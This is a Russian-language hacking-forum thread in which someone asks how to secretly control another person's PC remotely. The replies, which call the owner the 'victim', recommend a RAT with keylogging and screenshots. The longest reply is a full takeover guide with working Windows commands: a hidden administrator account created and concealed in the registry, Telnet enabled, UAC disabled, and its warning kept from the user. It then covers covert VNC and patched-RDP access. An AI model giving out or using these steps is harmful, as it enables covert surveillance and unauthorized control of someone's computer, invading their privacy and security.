Подскажите, пожалуйста, как из ПК можно сделать дедик? Задача - подкючаться удаленно незаметно для юзера. Заранее спасибо.
Да, доступ к ПК, к которому надо сделать удаленное подлючение, имеется. Посоветуйте может софт фришный какой-ниб?
Пуск - Удаленный Рабочий Стол А вот след. вопрос, без палево во время активной сессии юзера? Или же просто зайти, сделать дела и выйти? Как вариант создай учетку, замаскируй ее. В настройках ПК ищешь управление юзерами, тыкаешь "properties" и на вкладке что-то вроде "вмешаться в сессию" убираешь галку с "требовать подтверждение", ну логично чтобы в итоге было вмешиваться без подтверждения. При активной сессии "жертвы", логинишься учеткой скрытой, run taskmanager, вкладка "users" правой кнопочкой на его учетку и тыкаем удаленное управление. Результат - что-то вроде 2-е сессии активные на 1-ой учетке. Это самое элементарное из подручных средств. А так backdoor в руки, поднимай, заливай, и уже получай все тоже самое но все безпалева + куча плюшек аля кейлогер, скриншотер, стата, инфа машины и тд и тп К примеру паблик вариант pandora rat (google в помощь)
Вообще под словом "дедик" обычно подразумевается выделенный/виртуальный частный сервер, т.е. Dedicated Server (VDS/VPS). Но судя по вашему запросу, речь идёт о захвате некоторого удалённого компьютера. ____________________________ Часть 1: Сетевой доступ ____________________________ В первую очередь необходимо озаботиться о сетевом доступе. Если у компьютера уже есть белый статический IP-адрес - всё замечательно, это идеальный случай, так бывает редко. Чаще всего компьютер расположен за NAT (т.е. за одним роутером, или даже несколькими). При этом роутер может иметь статический или динамический IP-адрес. При статическом достаточно пробросить порты на роутере. ____________________________ А теперь я расскажу, как решается вопрос доступа внутрь NAT при динамическом адресе, или даже с серым IP-адресом: 1. Обратное соединение 2. VPN соединение 3. Программа роутер / VPN клиент Подробнее: 1. Для этого вам потребуется самому иметь белый IP-адрес, либо проброшенный порт на роутере с белым IP, либо собственный выделенный сервер с белым IP. Какие программы можно использовать: - revinetd (легко гуглится, легко собирается под Cygwin, и уже можно найти Win32 версию) 2. Для создания VPN соединения ваш роутер должен поддерживать работу VPN сервером (например последние модели роутеров ASUS или прошивка Wive-RTNL). Также с этим может помочь собственный выделенный сервер. Конкретных инструкций давать не буду, скажу лишь, что нужно будет подключить клиентский комп к VPN серверу по протоколу PPTP или L2TP. И тогда вы сможете находиться с ним в одной сетке. 3. Здесь выбор достаточно широк, и всё достаточно просто настраивается. На компе жертвы и вашем компе устанавливается VPN клиент, который связывает вас в одну псевдолокальную сеть. Программы вот эти: - LogMeIn Hamachi - Tunngle - Wippien - NeoRouter Выберите на свой вкус, все они примерно похожи. Инструкции в сети без труда найдёте. ____________________________ Часть 2: Удалённое управление ____________________________ Прежде чем приступать к этой части, полностью убедитесь, что связь работает стабильно, и автоматически переподключается при перезагрузке компа жертвы. В этой части я расскажу сами знаете о чём. ____________________________ Удалённое управление может быть разным. Это может быть терминал, в котором вы выполняете системные команды. Также это может быть непосредственно рабочий стол удалённого компьютера. В любом случае, нужно знать, хотя бы примерно, что и как работает. ____________________________ В первую очередь, вам потребуется создать свою учётную запись пользователя на компьютере, и сделать её скрытой от глаз жертвы. Делается примерно так: Code: net user Hacker fr0M.ant1CH@t_WiTH-l0v3 /add net localgroup Administrators Hacker /add net localgroup Администраторы Hacker /add net localgroup Users Hacker /delete net localgroup Пользователи Hacker /delete wmic UserAccount WHERE Name="Hacker" set PasswordExpires=FALSE reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Hacker /t REG_DWORD /d 0 /f Поясню: создаётся пользователь Hacker с хорошим паролем. Добавляется в группу администраторов (две версии для английской и русской винды), и убирается из группы простых пользователей (для лучшей скрытности). Также он добавляется в реестр в список специальных аккаунтов, это обеспечит максимальную скрытность учётки. ____________________________ Рассмотрим способы получения шелла. Для получения доступа к командной строке, достаточно включить Telnet на удалённом ПК. - Для Windows XP: Code: sc config TlntSvr start= auto sc start TlntSvr - Для Windows Vista (Telnet надо сначала установить): Code: PkgMgr /iu:"TelnetServer" sc config TlntSvr start= auto sc start TlntSvr net localgroup TelnetClients Hacker /add - Для Windows 7 и выше почти аналогично: Code: dism /online /Enable-Feature /FeatureName:TelnetServer sc config TlntSvr start= auto sc start TlntSvr net localgroup TelnetClients Hacker /add Для Vista и выше, если служба Telnet не запускается, проверьте, не заблокирована ли служба SecLogon. Code: sc config SecLogon start= demand sc start TlntSvr Также, хорошим тоном считается смена порта Telnet, но я не буду об этом рассказывать, легко гуглится. После этого, доступ по Telnet должен работать. Важно также помнить, что на Vista и выше есть фильтр админских прав - UAC, который включён по умолчанию. При входе в Telnet с работающим UAC все админские команды будут блокироваться. Это обходится либо входом в режиме NTLM, либо отключением UAC. Попрощаться с UAC можно этой командой: Code: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f После потребуется перезагрузка. Но помните, что отключив UAC, пользователь получит назойливое предупреждение от Windows, которое попытается заставить его включить UAC обратно. Скрыть это предупреждение можно от самого пользователя. ____________________________ Теперь можно плавно перейти к интерактивному управлению рабочим столом. Система Windows является многопользовательской. Это относится ко всем её выпускам, чего бы там ни говорили в официальных источниках. Она такая изнутри. Управлять Windows при помощи графического интерфейса можно двумя путями: 1. Подключиться непосредственно к консольной сессии и управлять клавиатурой и мышью пользователя. * под консольной сессией имеется ввиду рабочий стол пользователя, который он обычно видит на своём мониторе 2. Подключиться при помощи технологии удалённого рабочего стола. В первом случае можно использовать протокол VNC, например программы: - TightVNC Server (управление рабочим столом) - UltraVNC Server (управление рабочим столом) - RealVNC Enterprise (управление рабочим столом) - RAdmin (много функций) - DameWare (много функций) Первые две бесплатные, второй нужен ключ (который легко гуглится), остальные платные. Нужно помнить, что при использовании подобных программ, у пользователя может мигать курсор мыши на экране, когда вы следите за ним. Во втором случае всё происходит незаметно для глаз пользователя: В этом режиме создаётся отдельная сессия, которая никак не взаимодействует с консольной сессией. Это наиболее продвинутый вариант управления, который изначально был реализован в Citrix MultiFrame, но затем был взят на вооружение самой Microsoft, и теперь эта технология доступна во всех версиях Windows. Точнее, почти во всех. Официально, RDP поддерживается, начиная с редакции Professional, при этом нельзя работать одновременно с пользователем компьютера. Официально работать в RDP, при этом не выбивая пользователя из консольной сессии, можно только на Windows Server. Но если мы не боимся нарушения лицензий, политик продукта и тому подобного, мы можем обратить свой взгляд на большое число патчей и твиков, позволяющих разблокировать все возможности RDP. Здесь могу посоветовать RDP Wrapper Library, он позволяет получить RDP на всех системах начиная с Vista. Если интересует патч для Windows XP, то рекомендую Terminal Services (RDP) Realtime Patch. Кстати, обе программы создал я... (да, такой самопиар, куда же без него) Что-ж, на этом "краткий" экскурс по захватам закончу. P.S. в некоторых командах могут быть лишние пробелы, это баг движка форума. Надеюсь, вы поймёте, что и где исправить.
вот уже обсуждалось не раз вот тема где человек задал такой же вопрос https://forum.antichat.ru/showthread.php?t=270205